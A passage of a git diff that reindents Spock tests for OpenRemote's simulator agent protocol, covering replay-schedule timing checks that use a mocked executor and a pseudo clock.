+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.RAINFALL.name)).size() == 3
+      assert assetPredictedDatapointService.getDatapoints(new AttributeRef(weatherAsset2.id, WeatherAsset.UV_INDEX.name)).size() == 3
+    }
+
+    cleanup: "disable mock filter"
+    mockServer.finished = true
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/protocol/simulator/SimulatorProtocolTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/protocol/simulator/SimulatorProtocolTest.groovy
@@ -57,754 +57,755 @@ import static org.openremote.model.value.MetaItemType.HAS_PREDICTED_DATA_POINTS
 
 class SimulatorProtocolTest extends Specification implements ManagerContainerTrait {
 
-    private final static long SECOND_IN_MILLIS = 1000
-    private final static long MINUTE_IN_MILLIS = SECOND_IN_MILLIS * 60
-    private final static long HOUR_IN_MILLIS = MINUTE_IN_MILLIS * 60
-    private final static long DAY_IN_MILLIS = HOUR_IN_MILLIS * 24
-    private final static long WEEK_IN_MILLIS = DAY_IN_MILLIS * 7
+  private final static long SECOND_IN_MILLIS = 1000
+  private final static long MINUTE_IN_MILLIS = SECOND_IN_MILLIS * 60
+  private final static long HOUR_IN_MILLIS = MINUTE_IN_MILLIS * 60
+  private final static long DAY_IN_MILLIS = HOUR_IN_MILLIS * 24
+  private final static long WEEK_IN_MILLIS = DAY_IN_MILLIS * 7
 
-    private final static long HOUR_IN_SECONDS = 3600
+  private final static long HOUR_IN_SECONDS = 3600
 
-    static final PollingConditions conditions = new PollingConditions(timeout: 10, delay: 0.2)
+  static final PollingConditions conditions = new PollingConditions(timeout: 10, delay: 0.2)
 
-    @Shared
-    AssetStorageService assetStorageService
+  @Shared
+  AssetStorageService assetStorageService
 
-    @Shared
-    AssetDatapointService assetDatapointService
+  @Shared
+  AssetDatapointService assetDatapointService
 
-    @Shared
-    AssetPredictedDatapointService assetPredictedDatapointService
+  @Shared
+  AssetPredictedDatapointService assetPredictedDatapointService
 
-    @Shared
-    AgentService agentService
+  @Shared
+  AgentService agentService
 
-    @Shared
-    SimulatorAgent agent
+  @Shared
+  SimulatorAgent agent
 
-    ThingAsset asset
+  ThingAsset asset
 
-    SimulatorProtocol protocol
+  SimulatorProtocol protocol
 
-    ScheduledExecutorService originalExecutor
+  ScheduledExecutorService originalExecutor
 
-    // Delay of every schedule, so the schedule of an attribute can be resolved through the protocol's replay map
-    final Map<ScheduledFuture<?>, Long> delayByFuture = new ConcurrentHashMap<>()
+  // Delay of every schedule, so the schedule of an attribute can be resolved through the protocol's replay map
+  final Map<ScheduledFuture<?>, Long> delayByFuture = new ConcurrentHashMap<>()
 
-    def setupSpec() {
-        given: "environment is setup"
-        startContainer(defaultConfig(), defaultServices())
+  def setupSpec() {
+    given: "environment is setup"
+    startContainer(defaultConfig(), defaultServices())
 
-        // Setup services
-        assetStorageService = container.getService(AssetStorageService.class)
-        assetDatapointService = container.getService(AssetDatapointService.class)
-        assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
-        agentService = container.getService(AgentService.class)
+    // Setup services
+    assetStorageService = container.getService(AssetStorageService.class)
+    assetDatapointService = container.getService(AssetDatapointService.class)
+    assetPredictedDatapointService = container.getService(AssetPredictedDatapointService.class)
+    agentService = container.getService(AgentService.class)
 
-        // Create and link asset to agent
-        agent = new SimulatorAgent("Test agent").setRealm(Constants.MASTER_REALM)
-        agent = assetStorageService.merge(agent)
+    // Create and link asset to agent
+    agent = new SimulatorAgent("Test agent").setRealm(Constants.MASTER_REALM)
+    agent = assetStorageService.merge(agent)
 
-        // Wait until agent is connected before resetting the clock so attribute events are processed correctly
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-        }
+    // Wait until agent is connected before resetting the clock so attribute events are processed correctly
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+    }
+  }
+
+  def setup() {
+    stopPseudoClock()
+    setPseudoClock("1970-01-01T00:00:00.000Z")
+
+    delayByFuture.clear()
+    // Mock executor and rely on the delay argument to determine schedule
+    def executor = Mock(ScheduledExecutorService)
+
+    asset = new ThingAsset("Test asset").setRealm(Constants.MASTER_REALM)
+    asset = assetStorageService.merge(asset)
+
+    // Must use boxed Long type in Spock closures, so avoiding parameter expansion so it doesn't silently fail.
+    executor.schedule(_ as Runnable, _ as Long, _ as TimeUnit) >> { args ->
+      // Create a fresh future *per invocation*
+      def scheduledFuture = Mock(ScheduledFuture)
+      scheduledFuture.get() >> {
+        (args[0] as Runnable).run()
+        return true
+      }
+      // Recorded before the future is returned, so the protocol cannot publish it before its delay is known
+      delayByFuture.put(scheduledFuture, args[1] as Long)
+      return scheduledFuture
     }
 
-    def setup() {
-        stopPseudoClock()
-        setPseudoClock("1970-01-01T00:00:00.000Z")
+    protocol = (SimulatorProtocol) agentService.protocolInstanceMap.get(agent.getId())
+    originalExecutor = protocol.scheduledExecutorService
+    protocol.scheduledExecutorService = executor
+  }
 
-        delayByFuture.clear()
-        // Mock executor and rely on the delay argument to determine schedule
-        def executor = Mock(ScheduledExecutorService)
-
-        asset = new ThingAsset("Test asset").setRealm(Constants.MASTER_REALM)
-        asset = assetStorageService.merge(asset)
-
-        // Must use boxed Long type in Spock closures, so avoiding parameter expansion so it doesn't silently fail.
-        executor.schedule(_ as Runnable, _ as Long, _ as TimeUnit) >> { args ->
-            // Create a fresh future *per invocation*
-            def scheduledFuture = Mock(ScheduledFuture)
-            scheduledFuture.get() >> {
-                (args[0] as Runnable).run()
-                return true
-            }
-            // Recorded before the future is returned, so the protocol cannot publish it before its delay is known
-            delayByFuture.put(scheduledFuture, args[1] as Long)
-            return scheduledFuture
-        }
-
-        protocol = (SimulatorProtocol) agentService.protocolInstanceMap.get(agent.getId())
-        originalExecutor = protocol.scheduledExecutorService
-        protocol.scheduledExecutorService = executor
+  def cleanup() {
+    assetStorageService.delete(List.of(asset.getId()))
+    conditions.eventually {
+      protocol.linkedAttributes.size() == 0
     }
+    // The mock only lives as long as the feature that created it, so the protocol must not keep it afterwards
+    protocol.scheduledExecutorService = originalExecutor
+  }
 
-    def cleanup() {
-        assetStorageService.delete(List.of(asset.getId()))
-        conditions.eventually {
-            protocol.linkedAttributes.size() == 0
-        }
-        // The mock only lives as long as the feature that created it, so the protocol must not keep it afterwards
-        protocol.scheduledExecutorService = originalExecutor
-    }
-
-    private getDataPoints = {
-        def now = Instant
-                .ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.of("UTC")).toLocalDateTime();
-        new AssetDatapointAllQuery(
+  private getDataPoints = {
+    def now = Instant
+    .ofEpochMilli(getClockTimeOf(container)).atZone(ZoneId.of("UTC")).toLocalDateTime()
+    new AssetDatapointAllQuery(
             now.minus(1, ChronoUnit.HOURS),
             now.plus(1, ChronoUnit.HOURS),
-    ) }
+            )
+  }
 
-    /**
-     * The delay and future the protocol currently has scheduled for an attribute, or null while it has none. The
-     * executor is not told which attribute it schedules for, so the future is matched through the protocol's replay map.
-     */
-    private Map<String, ?> scheduledFor(AttributeRef attributeRef) {
-        def future = protocol.replayMap.get(attributeRef)
-        def delay = future != null ? delayByFuture.get(future) : null
-        return delay != null ? [delay: delay, future: future] : null
+  /**
+   * The delay and future the protocol currently has scheduled for an attribute, or null while it has none. The
+   * executor is not told which attribute it schedules for, so the future is matched through the protocol's replay map.
+   */
+  private Map<String, ?> scheduledFor(AttributeRef attributeRef) {
+    def future = protocol.replayMap.get(attributeRef)
+    def delay = future != null ? delayByFuture.get(future) : null
+    return delay != null ? [delay: delay, future: future] : null
+  }
+
+  private long getDatapointTimestamp(Attribute attribute) {
+    def datapoints = assetDatapointService.queryDatapoints(
+            asset.getId(),
+            attribute.getName(),
+            getDataPoints.call()
+            )
+    assert !datapoints.isEmpty()
+    return datapoints.get(0).getTimestamp()
+  }
+
+  def "Check Simulator Agent protocol without replay"() {
+    when: "nothing is configured"
+    asset.addOrReplaceAttributes(new Attribute<>("test1", ValueType.TEXT)
+            .addMeta(new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId())))
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test1").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
     }
 
-    private long getDatapointTimestamp(Attribute attribute) {
-        def datapoints = assetDatapointService.queryDatapoints(
-                asset.getId(),
-                attribute.getName(),
-                getDataPoints.call()
-        )
-        assert !datapoints.isEmpty()
-        return datapoints.get(0).getTimestamp()
+    and: "has schedule"
+    def schedule = agent.getAgentLink(attribute).schedule
+    schedule != null
+
+    and: "with a 1 day period"
+    def start = schedule.getStart()
+    schedule.getEnd() == start.plusDays(1)
+
+    and: "nothing happens"
+    assetDatapointService.getDatapoints(attributeRef).size() == 0
+  }
+
+  def "Check Simulator Agent protocol follows replay data end"() {
+    when: "nothing is configured"
+    def replayData = new SimulatorReplayDatapoint[] {
+              new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+              new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 23, "test"),
+              new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 12, "test")
+            }
+    asset.addOrReplaceAttributes(new Attribute<>("test1", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId(), replayData, null, null))
+                    ))
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test1").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
     }
 
-    def "Check Simulator Agent protocol without replay"() {
-        when: "nothing is configured"
-        asset.addOrReplaceAttributes(new Attribute<>("test1", ValueType.TEXT)
-                .addMeta(new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId())))
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test1").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    and: "has schedule"
+    def schedule = agent.getAgentLink(attribute).schedule
+    schedule != null
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
+    and: "with a 23 hour period"
+    def start = schedule.getStart()
+    schedule.getEnd() == start.plusHours(23)
+  }
 
-        and: "has schedule"
-        def schedule = agent.getAgentLink(attribute).schedule
-        schedule != null
+  def "Check Simulator Agent protocol with replay"() {
+    when: "replayData is configured to add a datapoint in 1hr, 12hrs, and 24hrs every day"
+    asset.addOrReplaceAttributes(new Attribute<>("test2", ValueType.TEXT)
+            .addMeta(new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                    new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                    new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 12, "test"),
+                    new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 24, "test")
+                    ).setSchedule(new SimulatorProtocol.Schedule(
+                    // We manually set the schedule so it starts when we want, as AgentLinks don't have access to the timer service
+                    LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, "FREQ=DAILY"
+                    ))))
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute = asset.getAttribute("test2").get()
+    def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
 
-        and: "with a 1 day period"
-        def start = schedule.getStart()
-        schedule.getEnd() == start.plusDays(1)
-
-        and: "nothing happens"
-        assetDatapointService.getDatapoints(attributeRef).size() == 0
+    then: "the agent status should become CONNECTED and the attribute linked to the protocol"
+    conditions.eventually {
+      assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
+      protocol.linkedAttributes.get(attributeRef) == attribute
     }
 
-    def "Check Simulator Agent protocol follows replay data end"() {
-        when: "nothing is configured"
-        def replayData = new SimulatorReplayDatapoint[] {
-            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 23, "test"),
-            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 12, "test")
-        }
-        asset.addOrReplaceAttributes(new Attribute<>("test1", ValueType.TEXT).addMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId(), replayData, null, null))
-        ))
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test1").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    (0..1).each { i ->
+      def days = i * HOUR_IN_MILLIS * 24 // Starts at 0 days, increments with 1 days
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
+      then: "the delay is 1 hour"
+      conditions.eventually {
+        scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
+      }
 
-        and: "has schedule"
-        def schedule = agent.getAgentLink(attribute).schedule
-        schedule != null
+      when: "fast forward 1 hour"
+      advancePseudoClock(1, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
 
-        and: "with a 23 hour period"
-        def start = schedule.getStart()
-        schedule.getEnd() == start.plusHours(23)
+      then: "datapoint is present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS
+      }
+
+      and: "the delay is 11 hours"
+      conditions.eventually {
+        scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 11
+      }
+
+      when: "fast forward 11 hours"
+      advancePseudoClock(11, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+      then: "datapoint is present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS * 12
+      }
+
+      and: "the delay is 12 hours"
+      conditions.eventually {
+        scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 12
+      }
+
+      when: "fast forward 12 hour"
+      advancePseudoClock(12, HOURS, container)
+      scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
+
+      then: "datapoints are present"
+      conditions.eventually {
+        getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS * 24
+      }
+    }
+  }
+
+  def "Check Simulator Agent protocol replays multiple attributes independently"() {
+    when: "one attribute replays daily from the epoch and another one once from the next day"
+    asset.addOrReplaceAttributes(
+            new Attribute<>("test8", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test")
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, "FREQ=DAILY"
+                            )))
+                    ),
+            new Attribute<>("test9", ValueType.TEXT).addMeta(
+                    new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 25, "test"),
+                            new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 49, "test")
+                            ).setSchedule(new SimulatorProtocol.Schedule(
+                            LocalDateTime.ofInstant(Instant.parse("1970-01-02T00:00:00.000Z"), ZoneOffset.UTC), null, null
+                            )))
+                    )
+            )
+    asset = assetStorageService.merge(asset)
+    def attribute1 = asset.getAttribute("test8").get()
+    def attribute2 = asset.getAttribute("test9").get()
+    def attributeRef1 = new AttributeRef(asset.getId(), attribute1.getName())
+    def attributeRef2 = new AttributeRef(asset.getId(), attribute2.getName())
+
+    then: "both attributes should be linked to the protocol"
+    conditions.eventually {
+      protocol.linkedAttributes.get(attributeRef1) == attribute1
+      protocol.linkedAttributes.get(attributeRef2) == attribute2
     }
 
-    def "Check Simulator Agent protocol with replay"() {
-        when: "replayData is configured to add a datapoint in 1hr, 12hrs, and 24hrs every day"
-        asset.addOrReplaceAttributes(new Attribute<>("test2", ValueType.TEXT)
-                .addMeta(new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 12, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 24, "test")
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        // We manually set the schedule so it starts when we want, as AgentLinks don't have access to the timer service
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, "FREQ=DAILY"
-                ))))
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test2").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
-
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
-
-        (0..1).each { i ->
-            def days = i * HOUR_IN_MILLIS * 24 // Starts at 0 days, increments with 1 days
-
-            then: "the delay is 1 hour"
-            conditions.eventually {
-                scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
-            }
-
-            when: "fast forward 1 hour"
-            advancePseudoClock(1, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoint is present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS
-            }
-
-            and: "the delay is 11 hours"
-            conditions.eventually {
-                scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 11
-            }
-
-            when: "fast forward 11 hours"
-            advancePseudoClock(11, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoint is present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS * 12
-            }
-
-            and: "the delay is 12 hours"
-            conditions.eventually {
-                scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 12
-            }
-
-            when: "fast forward 12 hour"
-            advancePseudoClock(12, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoints are present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS * 24
-            }
-        }
+    and: "each attribute has its own delay"
+    conditions.eventually {
+      scheduledFor(attributeRef1)?.delay == HOUR_IN_MILLIS
+      scheduledFor(attributeRef2)?.delay == DAY_IN_MILLIS + HOUR_IN_MILLIS
     }
 
-    def "Check Simulator Agent protocol replays multiple attributes independently"() {
-        when: "one attribute replays daily from the epoch and another one once from the next day"
-        asset.addOrReplaceAttributes(
-                new Attribute<>("test8", ValueType.TEXT).addMeta(
-                        new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                                new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                                new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test")
-                        ).setSchedule(new SimulatorProtocol.Schedule(
-                                LocalDateTime.ofInstant(Instant.parse("1970-01-01T00:00:00.000Z"), ZoneOffset.UTC), null, "FREQ=DAILY"
-                        )))
-                ),
-                new Attribute<>("test9", ValueType.TEXT).addMeta(
-                        new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                                new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                                new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 25, "test"),
-                                new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 49, "test")
-                        ).setSchedule(new SimulatorProtocol.Schedule(
-                                LocalDateTime.ofInstant(Instant.parse("1970-01-02T00:00:00.000Z"), ZoneOffset.UTC), null, null
-                        )))
-                )
-        )
-        asset = assetStorageService.merge(asset)
-        def attribute1 = asset.getAttribute("test8").get()
-        def attribute2 = asset.getAttribute("test9").get()
-        def attributeRef1 = new AttributeRef(asset.getId(), attribute1.getName())
-        def attributeRef2 = new AttributeRef(asset.getId(), attribute2.getName())
+    when: "fast forward 1 hour and only the first attribute is resolved"
+    advancePseudoClock(1, HOURS, container)
+    scheduledFor(attributeRef1).future.get()
 
-        then: "both attributes should be linked to the protocol"
-        conditions.eventually {
-            protocol.linkedAttributes.get(attributeRef1) == attribute1
-            protocol.linkedAttributes.get(attributeRef2) == attribute2
-        }
-
-        and: "each attribute has its own delay"
-        conditions.eventually {
-            scheduledFor(attributeRef1)?.delay == HOUR_IN_MILLIS
-            scheduledFor(attributeRef2)?.delay == DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        when: "fast forward 1 hour and only the first attribute is resolved"
-        advancePseudoClock(1, HOURS, container)
-        scheduledFor(attributeRef1).future.get()
-
-        then: "only the first attribute has a datapoint"
-        conditions.eventually {
-            getDatapointTimestamp(attribute1) == HOUR_IN_MILLIS
-        }
-
-        and: "the second attribute is untouched"
-        assetDatapointService.getDatapoints(attributeRef2).size() == 0
-
-        and: "the first attribute is scheduled for its second datapoint and the second attribute is unchanged"
-        conditions.eventually {
-            scheduledFor(attributeRef1)?.delay == HOUR_IN_MILLIS
-            scheduledFor(attributeRef2)?.delay == DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        when: "fast forward to the second attribute's first datapoint and only that attribute is resolved"
-        advancePseudoClock(1, DAYS, container)
-        scheduledFor(attributeRef2).future.get()
-
-        then: "the second attribute has a datapoint"
-        conditions.eventually {
-            getDatapointTimestamp(attribute2) == DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        and: "the first attribute still has only its own datapoint"
-        assetDatapointService.getDatapoints(attributeRef1).size() == 1
+    then: "only the first attribute has a datapoint"
+    conditions.eventually {
+      getDatapointTimestamp(attribute1) == HOUR_IN_MILLIS
     }
 
-    def "Check Simulator Agent protocol with replay startDate"() {
-        when: "replayData is configured to replay in 1day and 1hr"
-        asset.addOrReplaceAttributes(new Attribute<>("test3", ValueType.TEXT)
-                .addMeta(new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 25, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 49, "test")
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-02T00:00:00.000Z"), ZoneOffset.UTC), null, null
-                ))
-        )))
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test3").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    and: "the second attribute is untouched"
+    assetDatapointService.getDatapoints(attributeRef2).size() == 0
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
-
-        and: "the delay is 25 hours"
-        conditions.eventually {
-            scheduledFor(attributeRef)?.delay == DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        when: "fast forward 1 day and 1 hour"
-        advancePseudoClock(1, DAYS, container)
-        advancePseudoClock(1, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "datapoint is present"
-        conditions.eventually {
-            getDatapointTimestamp(attribute) == DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        // Starting at 2 days, because start date + first datapoint = 2 days since epoch
-        (2..3).each { i ->
-            def days = i * DAY_IN_MILLIS // Starts at 2 days, increments with 1 day
-
-            and: "the delay is 24 hours"
-            conditions.eventually {
-                scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS * 24
-            }
-
-            when: "fast forward 24 hours"
-            advancePseudoClock(24, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoint is present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == days + HOUR_IN_MILLIS
-            }
-        }
-
-        and: "attribute is removed from replay map"
-        conditions.eventually {
-            protocol.replayMap.get(attributeRef) == null
-        }
+    and: "the first attribute is scheduled for its second datapoint and the second attribute is unchanged"
+    conditions.eventually {
+      scheduledFor(attributeRef1)?.delay == HOUR_IN_MILLIS
+      scheduledFor(attributeRef2)?.delay == DAY_IN_MILLIS + HOUR_IN_MILLIS
     }
 
-    def "Check Simulator Agent protocol with custom recurrence schedule"() {
-        when: "replayData is configured to add a datapoint in 1hr, and 2hrs weekly on Mondays"
-        asset.addOrReplaceAttributes(new Attribute<>("test5", ValueType.TEXT).addMeta(
-                new MetaItem<>(AGENT_LINK, new SimulatorAgentLink(agent.getId()).setReplayData(
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS, "test"),
-                        new SimulatorReplayDatapoint(HOUR_IN_SECONDS * 2, "test")
-                ).setSchedule(new SimulatorProtocol.Schedule(
-                        // First day should be 1970-01-05 (in 4 days) a Monday
-                        LocalDateTime.ofInstant(Instant.parse("1970-01-05T00:00:00.000Z"), ZoneOffset.UTC),
-                        null,
-                        // Recur every Monday until 1970-01-31
-                        "FREQ=WEEKLY;UNTIL=19700131T000000;BYDAY=MO"
-                ))
-        )))
-        asset = assetStorageService.merge(asset)
-        def attribute = asset.getAttribute("test5").get()
-        def attributeRef = new AttributeRef(asset.getId(), attribute.getName())
+    when: "fast forward to the second attribute's first datapoint and only that attribute is resolved"
+    advancePseudoClock(1, DAYS, container)
+    scheduledFor(attributeRef2).future.get()
 
-        then: "the agent status should become CONNECTED and the attribute linked to the protocol"
-        conditions.eventually {
-            assetStorageService.find(agent.getId(), Agent.class).getAgentStatus().orElse(null) == ConnectionStatus.CONNECTED
-            protocol.linkedAttributes.get(attributeRef) == attribute
-        }
-
-        then: "the delay is 4 days and 1 hour"
-        conditions.eventually {
-            Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-01T00:00:00.000Z")
-            scheduledFor(attributeRef)?.delay == 4 * DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        when: "fast forward 4 days and 1 hour"
-        advancePseudoClock(4, DAYS, container)
-        advancePseudoClock(1, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "datapoint is present"
-        conditions.eventually {
-            getDatapointTimestamp(attribute) == 4 * DAY_IN_MILLIS + HOUR_IN_MILLIS
-        }
-
-        (0..2).each { i ->
-            def weeks = i * WEEK_IN_MILLIS // Starts at 0 weeks, increments with 1 week
-            def firstWeekOffset = 4 * DAY_IN_MILLIS;
-
-            and: "the delay is 1 hour"
-            conditions.eventually {
-                Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-05T01:00:00.000Z").plusMillis(weeks)
-                scheduledFor(attributeRef)?.delay == HOUR_IN_MILLIS
-            }
-
-            when: "fast forward 1 hour"
-            advancePseudoClock(1, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoint is present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == firstWeekOffset + weeks + 2 * HOUR_IN_MILLIS
-            }
-
-            and: "the delay is 1 week and -1 hour"
-            conditions.eventually {
-                Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-05T02:00:00.000Z").plusMillis(weeks)
-                scheduledFor(attributeRef)?.delay == WEEK_IN_MILLIS - HOUR_IN_MILLIS
-            }
-
-            when: "fast forward 1 week and -1 hour"
-            advancePseudoClock(7, DAYS, container)
-            advancePseudoClock(-1, HOURS, container)
-            scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-            then: "datapoint is present"
-            conditions.eventually {
-                getDatapointTimestamp(attribute) == firstWeekOffset + WEEK_IN_MILLIS + weeks + HOUR_IN_MILLIS
-            }
-        }
-
-        when: "fast forward past the end date"
-        scheduledFor(attributeRef).future.get() // resolve future manually, because we surpassed the delay
-
-        then: "the attributeRef should be present"
-        conditions.eventually {
-            Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-26T01:00:00Z") // Last monday
-            protocol.replayMap.get(attributeRef) != null
-        }
-
-        when: "fast forward 5 days and -1 hour"
-        advancePseudoClock(5, DAYS, container)
-        advancePseudoClock(-1, HOURS, container)
-        scheduledFor(attributeRef).future.get() // resolve future manually
-
-        then: "the attributeRef is removed from the replayMap"
-        conditions.eventually {
-            Instant.ofEpochMilli(getClockTimeOf(container)) == Instant.parse("1970-01-31T00:00:00Z") // Ends here
-            protocol.replayMap.get(attributeRef) == null
-        }
+    then: "the second attribute has a datapoint"
+    conditions.eventually {
